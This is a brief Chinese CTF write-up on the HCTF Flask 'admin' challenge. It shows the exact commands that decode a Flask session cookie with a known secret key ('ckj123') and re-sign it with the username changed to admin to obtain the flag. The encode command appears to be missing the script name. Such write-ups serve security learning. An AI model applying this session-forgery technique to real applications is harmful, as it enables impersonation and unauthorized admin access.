01、题目简介
02、解题步骤
启动并访问靶机

查看网页源代码,发现存在一条<!-- you are not admin -->

猜测获取flag需要登录admin账户,这边先注册一个账户,进去看一下,然后在change_password的页面里面发现存在以下链接
https://github.com/woadsl1234/hctf_flask/但是该项目目前已经打不开了,找不到源码了,只能猜测该项目是使用了Flask 框架,但是因为没有源码只能照着大佬们的WP去做。需要我们伪造身份,我们要进行session伪造,将我们的session伪造成admin的session。

对于session解密一下 ,因为没有key,所以从大佬的WP中剽窃到了key : ckj123
工具:https://github.com/noraj/flask-session-cookie-manager
python flask_session_cookie_manager3.py decode -c ".eJw9kEGLwjAQhf_KMmcPNVsvggeX1uJCJrSkhslFXK1N08QFq2gj_vcNLsjc5nu8N28esD2em8HA_LhzQzOBbXeA-QM-fmAOnJWpVjxoSymqypDnn6TWiZD7G4V2GonnGd1FUc6QrRlXuuOhvCGrvJZ0J-mcthjny1PIR255QnYdKFReqDollic82zhkaHS2ZNruA2bfhmQZdJEHofIp2UNP0jiRRY2vR860izekQq5i9spEDRMFX8BzAvvhfNxefvvm9K6AHp3O0JKsA3nt0G4MKexQrgwWdYK2n2lb38lu4o6PFFyvl4uXXed3bfN2oroasf0np52PANprM1xgAtehOb_-BtMEnn8hjW6n.ag5ZwQ.BcXKIT_GL2TvPhCNYPCXySAP3NA" -s "ckj123"
获得自己的session的解密,我们现在需要将自己注册的用户名更替成admin然后再使用key : ckj123进行加密
python -s "ckj123" -t "{'_fresh': False, '_id': b'3d8ec3f685dabc7ab4970c8536f0618d97b61fb3407dfe61a9ef3c60fc12234b23c4f9e8ca405e7cad06f7342aa43da39a5b7da8e83afe23feab891f01a9a68c', 'csrf_token': b'6ced3ca53bfe65aacb51a4e4699f51b5b532c9dd', 'image': b'aDr6', 'name': 'admin', 'user_id': '10'}"
然后进行替换cookie,就能获得flag了
